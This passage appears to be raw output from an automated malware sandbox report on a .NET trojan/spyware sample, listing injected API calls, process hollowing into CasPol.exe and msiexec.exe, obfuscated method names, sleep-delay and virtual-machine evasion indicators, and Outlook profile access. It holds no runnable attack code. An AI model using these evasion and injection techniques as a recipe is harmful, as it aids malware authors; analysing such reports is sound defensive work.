          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 0451B150 appears 35 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E593 NtCreateFile,2_2_0041E593
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E643 NtReadFile,2_2_0041E643
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E6C3 NtClose,2_2_0041E6C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E773 NtAllocateVirtualMemory,2_2_0041E773
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E58E NtCreateFile,2_2_0041E58E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E63D NtReadFile,2_2_0041E63D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E6BE NtClose,2_2_0041E6BE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0041E76D NtAllocateVirtualMemory,2_2_0041E76D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01439910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014399A0 NtCreateSection,LdrInitializeThunk,2_2_014399A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439840 NtDelayExecution,LdrInitializeThunk,2_2_01439840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01439860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014398F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_014398F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439A50 NtCreateFile,LdrInitializeThunk,2_2_01439A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01439A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439A20 NtResumeThread,LdrInitializeThunk,2_2_01439A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439540 NtReadFile,LdrInitializeThunk,2_2_01439540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014395D0 NtClose,LdrInitializeThunk,2_2_014395D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439710 NtQueryInformationToken,LdrInitializeThunk,2_2_01439710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439FE0 NtCreateMutant,LdrInitializeThunk,2_2_01439FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439780 NtMapViewOfSection,LdrInitializeThunk,2_2_01439780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014397A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_014397A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01439660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014396E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_014396E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439950 NtQueueApcThread,2_2_01439950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014399D0 NtCreateProcessEx,2_2_014399D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0143B040 NtSuspendThread,2_2_0143B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439820 NtEnumerateKey,2_2_01439820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_014398A0 NtWriteVirtualMemory,2_2_014398A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439B00 NtSetValueKey,2_2_01439B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_0143A3B0 NtGetContextThread,2_2_0143A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439A10 NtQuerySection,2_2_01439A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439A80 NtOpenDirectoryObject,2_2_01439A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 2_2_01439560 NtWriteFile,2_2_01439560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559840 NtDelayExecution,LdrInitializeThunk,4_2_04559840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559860 NtQuerySystemInformation,LdrInitializeThunk,4_2_04559860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559540 NtReadFile,LdrInitializeThunk,4_2_04559540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559560 NtWriteFile,LdrInitializeThunk,4_2_04559560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559910 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_04559910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045595D0 NtClose,LdrInitializeThunk,4_2_045595D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045599A0 NtCreateSection,LdrInitializeThunk,4_2_045599A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559A50 NtCreateFile,LdrInitializeThunk,4_2_04559A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045596D0 NtCreateKey,LdrInitializeThunk,4_2_045596D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045596E0 NtFreeVirtualMemory,LdrInitializeThunk,4_2_045596E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559710 NtQueryInformationToken,LdrInitializeThunk,4_2_04559710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559FE0 NtCreateMutant,LdrInitializeThunk,4_2_04559FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559780 NtMapViewOfSection,LdrInitializeThunk,4_2_04559780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0455B040 NtSuspendThread,4_2_0455B040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559820 NtEnumerateKey,4_2_04559820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045598F0 NtReadVirtualMemory,4_2_045598F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045598A0 NtWriteVirtualMemory,4_2_045598A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559950 NtQueueApcThread,4_2_04559950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0455AD30 NtSetContextThread,4_2_0455AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559520 NtWaitForSingleObject,4_2_04559520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045599D0 NtCreateProcessEx,4_2_045599D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045595F0 NtQueryInformationFile,4_2_045595F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559650 NtQueryValueKey,4_2_04559650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559670 NtQueryInformationProcess,4_2_04559670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559660 NtAllocateVirtualMemory,4_2_04559660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04559610 NtEnumerateValueKey,4_2_04559610
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_04559A10 NtQuerySection,4_2_04559A10
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_04559A00 NtProtectVirtualMemory,4_2_04559A00
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_04559A20 NtResumeThread,4_2_04559A20
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_04559A80 NtOpenDirectoryObject,4_2_04559A80
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_04559770 NtSetInformationFile,4_2_04559770
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0455A770 NtOpenThread,4_2_0455A770
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_04559760 NtOpenProcess,4_2_04559760
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0455A710 NtOpenProcessToken,4_2_0455A710
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_04559B00 NtSetValueKey,4_2_04559B00
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_04559730 NtQueryVirtualMemory,4_2_04559730
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0455A3B0 NtGetContextThread,4_2_0455A3B0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_045597A0 NtUnmapViewOfSection,4_2_045597A0
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0063C860 NtDeleteFile,4_2_0063C860
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0063C810 NtReadFile,4_2_0063C810
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0063C890 NtClose,4_2_0063C890
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0063C760 NtCreateFile,4_2_0063C760
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0063C85A NtDeleteFile,4_2_0063C85A
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0063C80A NtReadFile,4_2_0063C80A
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0063C88B NtClose,4_2_0063C88B
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0063C75B NtCreateFile,4_2_0063C75B
          Source: file.exe, 00000000.00000000.245150456.0000000000FBA000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameHBhG.exe* vs file.exe
          Source: file.exe Binary or memory string: OriginalFilenameHBhG.exe* vs file.exe
          Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
          Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: file.exe ReversingLabs: Detection: 61%
          Source: file.exe Virustotal: Detection: 51%
          Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
          Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\30q5648k6
          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@9/9
          Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\file.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: file.exe, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs Cryptographic APIs: 'CreateDecryptor'
          Source: 0.0.file.exe.f20000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs Cryptographic APIs: 'CreateDecryptor'
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\SysWOW64\msiexec.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msiexec.pdb source: CasPol.exe, 00000002.00000002.285603663.0000000001390000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: CasPol.exe, 00000002.00000002.285603663.0000000001390000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: caspol.pdbdv source: explorer.exe, 00000003.00000002.529615477.0000000014033000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.515930309.0000000004833000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: HBhG.pdbHw^w Pw_CorExeMainmscoree.dll source: file.exe
          Source: Binary string: wntdll.pdbUGP source: CasPol.exe, 00000002.00000003.249624955.0000000001238000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.247629652.0000000001093000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.287312928.0000000004359000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.284760450.00000000041C2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: caspol.pdb source: explorer.exe, 00000003.00000002.529615477.0000000014033000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.515930309.0000000004833000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: CasPol.exe, CasPol.exe, 00000002.00000003.249624955.0000000001238000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, CasPol.exe, 00000002.00000003.247629652.0000000001093000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000002.513198532.00000000044F0000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.287312928.0000000004359000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.284760450.00000000041C2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: HBhG.pdb source: file.exe

          Data Obfuscation

          Source: file.exe, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: 0.0.file.exe.f20000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 2_2_0041157F push esp; ret 2_2_0041161D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 2_2_004115EB push esp; ret 2_2_0041161D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 2_2_0041B619 push edx; retf 2_2_0041B622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 2_2_00401E30 push eax; ret 2_2_00401E32
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 2_2_0144D0D1 push ecx; ret 2_2_0144D0E4
          Source: C:\Windows\explorer.exe Code function: 3_2_05AA0BF5 push ebx; ret 3_2_05AA0BFE
          Source: C:\Windows\explorer.exe Code function: 3_2_0E0F0BF5 push ebx; ret 3_2_0E0F0BFE
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0456D0D1 push ecx; ret 4_2_0456D0E4
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_0064114E push 889F0DC1h; retf 4_2_00641153
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_006397E6 push edx; retf 4_2_006397EF
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_006407D9 push edi; ret 4_2_006407DB
          Source: file.exe Static PE information: 0xC2A5F7A7 [Sun Jun 25 22:52:23 2073 UTC]
          Source: initial sample Static PE information: section name: .text entropy: 7.9572107240717935
          Source: file.exe, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs High entropy of concatenated method names: '.cctor', 'EtPuOwMCPLr9b', 'r2IpAKlG6', 'hGsbFRpY8', 'IrZyuAlDu', 'fx9OFFByU', 'qTICie1Py', 'XWCmmQgZX', 'btCsQAPPe', 'VoCdgurnq'
          Source: file.exe, r2IAKlRG66GsFRpY8s/Rgao1DSUgXiqx7XtVU.cs High entropy of concatenated method names: 'NaouOwMM6O7BT', '.ctor', '.cctor', 'IaPjRwsLA5A6wxgXlT', 'J2ZAvR413xLSNbSkcx', 'dgxHTSUaH58s29fuBK', 'RHrpukGC4afpqFJvyZ', 'HVn4AvCwdKviDqhZ6Q', 'Qun0pO8JZB7oSWWdnr', 'N2mR9GSHkXy0MyWMcR'
          Source: 0.0.file.exe.f20000.0.unpack, SAPPewBoCgurnqYPHF/fie1PygFWCmQgZXqtC.cs High entropy of concatenated method names: '.cctor', 'EtPuOwMCPLr9b', 'r2IpAKlG6', 'hGsbFRpY8', 'IrZyuAlDu', 'fx9OFFByU', 'qTICie1Py', 'XWCmmQgZX', 'btCsQAPPe', 'VoCdgurnq'
          Source: 0.0.file.exe.f20000.0.unpack, r2IAKlRG66GsFRpY8s/Rgao1DSUgXiqx7XtVU.cs High entropy of concatenated method names: 'NaouOwMM6O7BT', '.ctor', '.cctor', 'IaPjRwsLA5A6wxgXlT', 'J2ZAvR413xLSNbSkcx', 'dgxHTSUaH58s29fuBK', 'RHrpukGC4afpqFJvyZ', 'HVn4AvCwdKviDqhZ6Q', 'Qun0pO8JZB7oSWWdnr', 'N2mR9GSHkXy0MyWMcR'
          Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\file.exe TID: 1676 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3140 Thread sleep time: -54000s >= -30000s
          Source: C:\Windows\SysWOW64\msiexec.exe Last function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 2_2_01426B90 rdtsc 2_2_01426B90
          Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 870
          Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 874
          Source: C:\Windows\SysWOW64\msiexec.exe API coverage: 9.8 %
          Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\msiexec.exe Code function: 4_2_006331A0 FindFirstFileW,FindNextFileW,FindClose,4_2_006331A0
          Source: explorer.exe, 00000003.00000003.462325908.000000000684F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.524083491.00000000081DD000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000^
          Source: explorer.exe, 00000003.00000002.522356156.0000000006710000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
          Source: explorer.exe, 00000003.00000003.460995105.000000000F53F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.528827220.000000000F54E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.460785675.000000000F4B5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 00000003.00000003.462793270.0000000008304000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000003.462793270.00000000082B2000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.259739427.0000000008200000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>&
          Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 2_2_0141B944 mov eax, dword ptr fs:[00000030h] 2_2_0141B944
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AC450 mov eax, dword ptr fs:[00000030h]4_2_045AC450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AC450 mov eax, dword ptr fs:[00000030h]4_2_045AC450
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454A44B mov eax, dword ptr fs:[00000030h]4_2_0454A44B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E1074 mov eax, dword ptr fs:[00000030h]4_2_045E1074
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D2073 mov eax, dword ptr fs:[00000030h]4_2_045D2073
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0453746D mov eax, dword ptr fs:[00000030h]4_2_0453746D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E4015 mov eax, dword ptr fs:[00000030h]4_2_045E4015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E4015 mov eax, dword ptr fs:[00000030h]4_2_045E4015
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04597016 mov eax, dword ptr fs:[00000030h]4_2_04597016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04597016 mov eax, dword ptr fs:[00000030h]4_2_04597016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04597016 mov eax, dword ptr fs:[00000030h]4_2_04597016
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E740D mov eax, dword ptr fs:[00000030h]4_2_045E740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E740D mov eax, dword ptr fs:[00000030h]4_2_045E740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E740D mov eax, dword ptr fs:[00000030h]4_2_045E740D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596C0A mov eax, dword ptr fs:[00000030h]4_2_04596C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596C0A mov eax, dword ptr fs:[00000030h]4_2_04596C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596C0A mov eax, dword ptr fs:[00000030h]4_2_04596C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_04596C0A mov eax, dword ptr fs:[00000030h]4_2_04596C0A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045D1C06 mov eax, dword ptr fs:[00000030h]4_2_045D1C06
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452B02A mov eax, dword ptr fs:[00000030h]4_2_0452B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452B02A mov eax, dword ptr fs:[00000030h]4_2_0452B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452B02A mov eax, dword ptr fs:[00000030h]4_2_0452B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0452B02A mov eax, dword ptr fs:[00000030h]4_2_0452B02A
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454BC2C mov eax, dword ptr fs:[00000030h]4_2_0454BC2C
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454002D mov eax, dword ptr fs:[00000030h]4_2_0454002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454002D mov eax, dword ptr fs:[00000030h]4_2_0454002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454002D mov eax, dword ptr fs:[00000030h]4_2_0454002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454002D mov eax, dword ptr fs:[00000030h]4_2_0454002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_0454002D mov eax, dword ptr fs:[00000030h]4_2_0454002D
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045E8CD6 mov eax, dword ptr fs:[00000030h]4_2_045E8CD6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AB8D0 mov eax, dword ptr fs:[00000030h]4_2_045AB8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AB8D0 mov ecx, dword ptr fs:[00000030h]4_2_045AB8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AB8D0 mov eax, dword ptr fs:[00000030h]4_2_045AB8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AB8D0 mov eax, dword ptr fs:[00000030h]4_2_045AB8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AB8D0 mov eax, dword ptr fs:[00000030h]4_2_045AB8D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4_2_045AB8D0 mov eax, dword ptr fs:[00000030h]4_2_045AB8D0
